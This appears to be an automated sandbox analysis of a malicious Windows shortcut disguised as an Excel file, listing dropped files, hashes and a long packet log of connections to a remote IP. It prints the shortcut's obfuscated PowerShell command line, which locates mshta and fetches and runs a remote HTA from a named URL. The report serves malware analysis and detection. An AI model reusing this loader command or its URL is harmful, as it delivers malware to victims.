SHA1:1B3B3318CDB9098A3DCAD96ECF57D983663E5013
SHA-256:98DCFD594B2BEFC0AFF0F77CB17E65BA85A89104A848DC003C81289A3C1B6635
SHA-512:F4DB5FF98FF1A3D3CE1D22A4566BB3267EBBD3A23677BCE40A47742A020DCD5632ADFEB5E3B98397449C0C7635B675CEABD042FE7689F07253BE69A9CE4D4FBD
Malicious:true
Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Ucvuiswb.PIF"..IconIndex=61..HotKey=50..
Process:C:\Windows\System32\mshta.exe
File Type:PGP Secret Sub-key -
Category:dropped
Size (bytes):78133
Entropy (8bit):6.266039571888932
Encrypted:false
SSDEEP:1536:JGgLIQnvgGY9GpGOG2GSGhGKpSozTqQZwnLPcS:TvTY9GpGOG2GSGhGKpvzTTZeLUS
MD5:16D297E8EEE126E4B52198EFF43B6C36
SHA1:5FF70DD47D868EDB3F837511A55030810EC7968B
SHA-256:9A3B2D8D0E1DA113F6C12A4D1517C71B8810006A3031CF129CE2ACE2B2BE673F
SHA-512:604EF34A0953D7FA1A435115F603CA45FF5B26F5033D1611D28FEBE2440B45E8506EF5F8EABF1B6302D4AE61A10964F6086B4E3387C3C5AAB06932BACE13C6E5
Malicious:false
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):9434
Entropy (8bit):4.9243637703272345
Encrypted:false
SSDEEP:192:exoe5lpOdxoe56ib49Vsm5emdagkjDt4iWN3yBGHB9smMdcU6CBdcU6Ch9smPpOU:cVib49Vkjh4iUx4cYKib4o
MD5:EF4099FCAB6D29945272316889156337
SHA1:5AAFAD4581D21179B892604BEBD6038792F8CBD6
SHA-256:A86220AB1F2A5498457C8801DFCBB2FE3EA6977378CE7E3EEBD007336AFDB3BC
SHA-512:EC9BB5508D39E6C038878F789DE84F7FBDC87CD20AE3EF81D68BC6589784ADB98EDCDEBF544A463C0AB2F01F52B743803A49A4F3A54FD3D003851B7DEEB8014C
Malicious:false
Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):2920
Entropy (8bit):5.449039162601703
Encrypted:false
SSDEEP:48:4OAzsSU4xymI4RfoUeCa+m9qr9t5/78Nfk+GGxJZKaVEouYAgwd64rHLjtvt:1AzlHxvIIwLz9qrh7KfkUJ5Eo9Adrxt
MD5:937B7C51E18308029AF0712C90527DF8
SHA1:3138CAC41F1620E3823BA42E8940897D0E9D33B9
SHA-256:DBBE368ED1DA16AC950E52E3654DEDA0A4BABADAFF98174DC4D2B688D9814D4C
SHA-512:9D1E60571389C319B0E6ACC257357FD176913BE9CF695404C093094CA88EA4DC6095C8E0475B48050653FA651A98826BDC7D463C6CAA1DDB9AA75D47DE1B30D8
Malicious:false
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):64
                                                                                                                          Entropy (8bit):0.34726597513537405
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Nlll:Nll
                                                                                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):5432
                                                                                                                          Entropy (8bit):3.5230635675057824
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:0rRK4kngzdCZlXuCrdZSQJIQJl2/bW/gpCl6aSogZo/JPJaW/bW/gpClJaSogZog:0FK4kfuCKRl/q/gpCuHa/q/gpCnH1
                                                                                                                          MD5:F0AF6AC48366F8841F3F87FC0169B09F
                                                                                                                          SHA1:1743C152D36A35FAD3F38A5F3435DDE13425BB05
                                                                                                                          SHA-256:84F2B4171FE48BB6EF9D9D36CF2A392EF57AC100C111C608883B3F4D4A9789BF
                                                                                                                          SHA-512:7A64A90931B9220E4C3F54EE701A629CA4E66C74DD56D801416EEDB1CF235CF9FA7228F4EAA7D4569C09DF311AADCAC5F5BAC58E9FAAF2676F4C2AF88D3CEA51
                                                                                                                          Malicious:false
                                                                                                                          Preview:...................................FL..................F.`.. .....e2a......1....&.+1....P............................P.O. .:i.....+00.:...:..,.LB.)...A&...&........*_......4a......1......z.2.P....X.% .FT40FE~1.LNK..^......EW.>.X.%...........................j..F.T... .4.0.F.E. .C.N.Y. ...x.l.s.x...l.n.k.......`...............-......._...........6.0......C:\Users\user\Desktop\FT. 40FE CNY .xlsx.lnk..A.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.r.o.o.t.\.O.f.f.i.c.e.1.6.\.X.L.I.C.O.N.S...E.X.E.........%ProgramFiles(x86)%\Microsoft Office\root\Office16\XLICONS.EXE......................................................................................................................................................................................................%.P.r.o.g.r.a.m.F.i.l.e.s.(.x.8.6.).%.\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.r.o.o.t.\.O.f.f.i.c.e.1.6.\.X.L.I.C.O.N.S...E.X.E.................................................................
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1646592
                                                                                                                          Entropy (8bit):7.466963242088156
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:NGLyrlj2BH1btTfnxx+KKozJQd/HJNRO/BwTQ+l04pEnlk8U2flxAu:NGup2B+K1mzywTQh4psG2Z
                                                                                                                          MD5:E6AC6CA27AA2D60DC59A21AF1FFDB086
                                                                                                                          SHA1:9F847E34521E8917C8B22ECA53B71306BC19AF18
                                                                                                                          SHA-256:A5B3CE892D48757DF98FEA906DFF92E0210DCBD8D1832E43DFBD2A5ECE61FBA1
                                                                                                                          SHA-512:9F4C1E3CB03CD1333A7F2E01F7A3D61803844FC4C1531DD432CC7B7DEDC5625D1253715200CB7E0F6B9C7F906A6DCBB488196153E1E2DC935B27B66D74431EE4
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          • Antivirus: ReversingLabs, Detection: 58%
                                                                                                                          • Antivirus: Virustotal, Detection: 38%, Browse
                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................p..........D.............@..............................................@........................... ..X$...........................p...`...........................`.......................&...............................text....g.......h.................. ..`.itext...............l.............. ..`.data...LK.......L...t..............@....bss....l6...............................idata..X$... ...&..................@....tls....4....P...........................rdata.......`......................@..@.reloc...`...p...b..................@..B.rsrc................J..............@..@..................... ..............@..@................................................................................................
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:JSON data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):55
                                                                                                                          Entropy (8bit):4.306461250274409
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                          Malicious:false
                                                                                                                          Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
File type: MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=1, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
Entropy (8bit): 2.788293913847845
TrID:
• Windows Shortcut (20020/1) 100.00%
File name: FT. 40FE CNY .xlsx.lnk
File size: 2'128 bytes
MD5: 82fde340f187a517e0feced1d4972363
SHA1: 07740ba4e30a1dbc830451a0d05130ba1af28be9
SHA256: e900f16dc064f78f6d81fda1dc52a17116d4bb578e6ef528e2f04b3e46b434a3
SHA512: db1630813f3a6e19b9c1bfb6dbaecd3829592230635721df5e2121217bbe2ea2a7594eae7061d5d2ce2baf4bfad5687ce22fa58dba94e8e30b0d7630e872f79c
SSDEEP: 24:8A/BHYVKVWXlMT+/CWlrDA4mzScdCZTCJCZkrab0JG:8E5aeCfA4mldCZTCJCZ6aQ
TLSH: 73419B106BF20714F7F79E7A2CB5B71199377805DE12CF9D005141482475E61E879F1B
File Content Preview: L..................F.@...........................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................
Icon Hash: 74f4e6c4c4c9c1cd

General

Relative Path: ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command Line Argument: .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://www.sessosesso.it/assets/aw/yt.hta
Icon location: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                                          Apr 24, 2024 06:45:28.985102892 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.985102892 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.986037016 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.986052036 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.986150026 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.986155987 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.986197948 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.987032890 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.987047911 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.987103939 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.987112045 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.987149000 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.987833023 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.987849951 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.987895012 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.987901926 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.987941027 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.987967968 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.988779068 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.988794088 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.988831997 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.988838911 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.988862038 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.988888025 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.068779945 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.068799019 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.068909883 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.068948030 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.068993092 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.069993973 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.070009947 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.070060015 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.070080042 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.070122004 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.071002960 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.071018934 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.071067095 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.071074009 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.071110010 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.071804047 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.071820021 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.071876049 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.071882963 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.071923971 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.072911024 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.072928905 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.072990894 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.072997093 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.073035002 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.301213980 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.301223040 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.301254988 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.301326990 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.301337004 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.301347971 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.301392078 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.302270889 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.302288055 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.302359104 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.302366972 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.302412033 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.303030014 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.303045988 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.303107023 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.303113937 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.303148031 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.304012060 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.304027081 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.304075003 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.304083109 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.304105043 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.304133892 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.304835081 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.304852009 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.304951906 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.304958105 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.304999113 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.305660963 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.305677891 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.305742025 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.305747986 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.305787086 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.306668997 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.306685925 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.306725979 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.306746006 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.306768894 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.306783915 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.307312965 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.307328939 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.307382107 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.307389021 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.307424068 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.308296919 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.308336973 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.308362007 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.308367968 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.308403969 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.308428049 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.309854031 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.309874058 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.309922934 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.309928894 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.309983015 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.309995890 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.311034918 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.311053038 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.311113119 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.311119080 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.311162949 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.311959982 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.311980009 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.312022924 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.312028885 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.312062025 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.312077999 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.312935114 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.312953949 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.313010931 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.313021898 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.313066006 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.313801050 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.313817024 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.313879013 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.313885927 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.313921928 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.314676046 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.314691067 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.314750910 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.314755917 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.314790964 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.386143923 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.386164904 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.386229992 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.386244059 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.386287928 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.386307001 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.387232065 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.387259960 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.387305975 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.387311935 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.387358904 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.388020992 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.388037920 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.388221025 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.388227940 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.388268948 CEST49713443192.168.2.789.46.106.29
Timestamp                             Source Port  Dest Port  Source IP        Dest IP
Apr 24, 2024 06:45:29.388988018 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:29.389004946 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:29.389050007 CEST  49713        443        192.168.2.7      89.46.106.29
Apr 24, 2024 06:45:29.389056921 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:29.389080048 CEST  49713        443        192.168.2.7      89.46.106.29
Apr 24, 2024 06:45:29.389101982 CEST  49713        443        192.168.2.7      89.46.106.29
Apr 24, 2024 06:45:29.389722109 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:29.389739037 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:29.389801025 CEST  49713        443        192.168.2.7      89.46.106.29
Apr 24, 2024 06:45:29.596126080 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:29.649704933 CEST  49713        443        192.168.2.7      89.46.106.29
Apr 24, 2024 06:45:29.860126972 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:29.860243082 CEST  49713        443        192.168.2.7      89.46.106.29
Apr 24, 2024 06:45:30.284126997 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.284212112 CEST  49713        443        192.168.2.7      89.46.106.29
Apr 24, 2024 06:45:30.405590057 CEST  49713        443        192.168.2.7      89.46.106.29
Apr 24, 2024 06:45:30.405603886 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.405620098 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.405657053 CEST  49713        443        192.168.2.7      89.46.106.29
Apr 24, 2024 06:45:30.405663967 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.405682087 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.405705929 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.405718088 CEST  49713        443        192.168.2.7      89.46.106.29
Apr 24, 2024 06:45:30.405723095 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.405735970 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.405750990 CEST  49713        443        192.168.2.7      89.46.106.29
Apr 24, 2024 06:45:30.405759096 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.405803919 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.405811071 CEST  49713        443        192.168.2.7      89.46.106.29
Apr 24, 2024 06:45:30.405832052 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.405841112 CEST  49713        443        192.168.2.7      89.46.106.29
Apr 24, 2024 06:45:30.405848980 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.405879021 CEST  49713        443        192.168.2.7      89.46.106.29
Apr 24, 2024 06:45:30.405889034 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.405900002 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.405910969 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.405939102 CEST  49713        443        192.168.2.7      89.46.106.29
Apr 24, 2024 06:45:30.405949116 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.406014919 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.406030893 CEST  49713        443        192.168.2.7      89.46.106.29
Apr 24, 2024 06:45:30.406039953 CEST  443          49713      89.46.106.29     192.168.2.7
Apr 24, 2024 06:45:30.406147957 CEST  49713        443        192.168.2.7      89.46.106.29
Apr 24, 2024 06:45:30.406227112 CEST  49713        443        192.168.2.7      89.46.106.29
Apr 24, 2024 06:45:30.406879902 CEST  49713        443        192.168.2.7      89.46.106.29
